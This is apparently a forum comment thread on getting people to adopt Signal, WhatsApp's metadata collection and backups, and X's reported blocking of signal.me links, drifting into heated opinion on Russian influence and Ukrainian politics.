I usually tell people, "It's like iMessage, but it works on iPhone and Android," or "Hey, if you download Signal we can send high-quality photos between Android and iPhone."
My (non-technical) Mom actually got my whole extended family on Signal with a group link. Since there's no real account creation it was painless. It's how we do all video calls/photo sharing/chat now.
I helped an especially non-technical user install Signal and they didn't need my help at all. They were using it in a minute - download from the app store, transcribe a code from a text message, and you're in - and it worked just like legacy text and phone.
I'd tell them that - just download it and you'll be texting me in a minute, and now nobody is tracking everyone you talk to.
To be clear, someone will/can track WHO you talk to. Right?
My understanding is that they can/do on WhatsApp.
On Signal, unless there is a some bug or outright fraud, afaik they cannot - that is one of their fundamental goals, and they did a lot of work to develop communication technology that worked without revealing that metadata.
(Of course, if someone gets access to your phone, then they know who you are talking to.)
That kind of meta data is not stored by signal as far as I know. But yes, data stream between two end points can be linked to communicating with each other.
I've still got Signal installed, but never use it, I only ever ended up chatting on it with a few ex-colleagues, who were fellow devs / nerds.
I have so many WhatsApp group chats (here in Australia) that are critical for me these days, and that I don't control, and that have way too many people, and way too diverse a range of people, for me to have any hope whatsoever of migrating them all to Signal. School parents group chats (one for each class that my kids are in). Strata (aka Home Owners Association) committee group chat. Scouts group chat. Various friends groups chats. Boycotting WhatsApp is not an option for me, it would literally make me unable to function in a number of my day-to-day responsibilities.
Group stories are great fun and a feature I seriously miss on Whatsapp. They work well from meme chats to family groups.
There being a killer feature that Whatsapp users are missing out on won't convince everyone but it sure makes me feel less like a nerd when encouraging the switch to Signal.
I find it quite funny that such an obvious feature likely hasn't been added to Whatsapp yet because Meta thinks Instagram is for stories. That's pure speculation on my part though
I've had good luck just asking for it, even with group chats (though admittedly my friends are mostly technical and more privacy conscious than the average person). Usually it's a switch from FB Messenger and I just say that I don't want to be locked into Facebook anymore.
Just explain what end to end encryption means. People are starting to get it and don’t want companies able to read their messages.
Isn’t WhatsApp end-to-end encrypted?
Yes it is, they actually use the signal protocol,[0] but they collect metadata which Signal supposedly doesn't (you can't really know)
[0] https://en.wikipedia.org/wiki/Signal_Protocol#:~:text=Severa...
Signal doesn't collect that data, but you have no reason to trust me on it.
Look at what data they can provide to governments when compelled by law: https://signal.org/bigbrother/
I thought they recorded the metadata - who talks to who and when. (For the uninitiated, that is as valuable or more valuable than the message contents.)
you also send them your contacts in plaintext so you can find who's also on WhatsApp; signal doesn't
https://www.reddit.com/r/privacy/comments/v7tsou/is_whatsapp...
It seems to be but there is more to it than that.
Nobody cares about this unless they deal drugs or something.
What some people care about is not giving all their private conversations to masculine energy zuck - but don't expect any major wins.
Awful shortsighted and uninformed viewpoint that has been beaten into the ground ad nauseum.
Read a couple books. Privacy is a precondition to democracy.
It isn't a viewpoint. It's a fact. I'm using signal for almost a decade now and only managed to get a dozen or so people to use it in any capacity. Most keep using whatsapp as their primary method of communication anyway.
Meanwhile, I have been using Signal since the TextSecure days, too, and practically all my contacts are using it these days.
Good for you, tell us how you did it!
What books would you recommend, that proof that connection?
"Privacy is a precondition to democracy"
How would you convert an autocracy into a democracy without secrecy? There are no peaceful means so you have to plot.
Secrecy and privacy is not really the same concept.
>Read a couple books
Maybe you should? It might help improve your reading comprehension. The person you're responding to said that most normal people don't care enough to switch to a vastly less popular app, which is obviously true.
My Signal experience: ex gf in college asks what app I’m using to text. Tell her it’s Signal, E2EE, messages are only stored on her phone and nobody else can read them. She says cool and downloads the app. Four months later her phone breaks.
“Hey subjectsigma I got my new phone today. Where are all my messages?”
“… Do you have your old phone? That’s the only place they are.”
“No? Last time I got a new phone WhatsApp moved my messages over, and WA is E2EE so I thought it worked the same way.”
“Nope if you don’t have a backup or your old phone they’re gone. Sorry.”
“This is bullshit. Why does anyone use Signal. I can’t believe it deleted all my messages. I’m uninstalling it. Etc etc.”
We have a long way to go, my friend.
It only works for WhatsApp if you have Backup to Google activated[1]. I once tried to work with backuped files from my old phone and it didn't work. (Older tutorials indicated that it once worked, though.)
[1] There was a time WhatsApp had a nag-screen if you hadn't Backup to Google activated. So I guess most people would have eventually caved.
That nag-screen is still there, it pops up roughly every three months for me (though not on my primary phone, Whatsapp won't get anywhere near that one).
Russia fucking up the worlds stuff this decade will be the material for history books. The are actively breaking Europe and almost noone seems to care.
Second will be how the internet with social media like twitter/x destroyed our democracy.
If Europe is what it claims to be: an enlightened democracy with progressive intelligent populace it can not be broken by demented crap messages from twitter.
If however it is fucked up and on a brink of collapse then sure. Little nudge can steer it into "right" direction. but then who is guilty in a first place.
You should read up on how russian money buys influenve, eg. In Moldavia.
the idea that propaganda doesn't work is certainly an interesting one.
That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
Impossible these are our newly minted allies
Ok I laughed! :) But it's crazy if you think about it, isn't it?
New allies, same as the old allies.
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
I'm not going to psychoanalyse the brain parasite, but I imagine that the reason to do it could be as petty as shadow banning people with Fediverse (e.g. mastodon) handles in their bios shortly after he took over.
Also:
> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE. > from https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...
Btw, I don't live in the US but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app
Only signal.me links were blocked as far as I understood. Other signal links kept working. (I have no first hand knowledge as I left Twitter when the owner changed)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really, the domain block was reportedly due to increased spam activity from that domain and performed automatically, so it would follow that a write up would come a few days later. That is if they are related, which is not a given.
Musk calls everything he doesn't like "spam", so of course it was.
It’s still a social media platform, not every action taken is some nebulous part of Musks agenda. Odds are there was an influx of posts that qualify as spam from the signal.me domain that were marked by an automatic system as spam, because they were. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
>So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
Not surprising considering Russian Oligarchs enabled Musk's takeover of Twitter:
https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...
Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)
You can't be serious that you consider that to be a good enough reasoning.
Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.
> Zelensky defeated Poroshenko
And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.
Maybe because Poroshenko is an oligarch and a piece of shit?
Still a former elected president, isn't he?
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless re-elected, and there were no elections since the beginning of the war.
The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.
Why are you repeating Kremlin's talking points?
Using the exact same reasoning, Churchill would be a dictator, too.
Highly likely...
Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."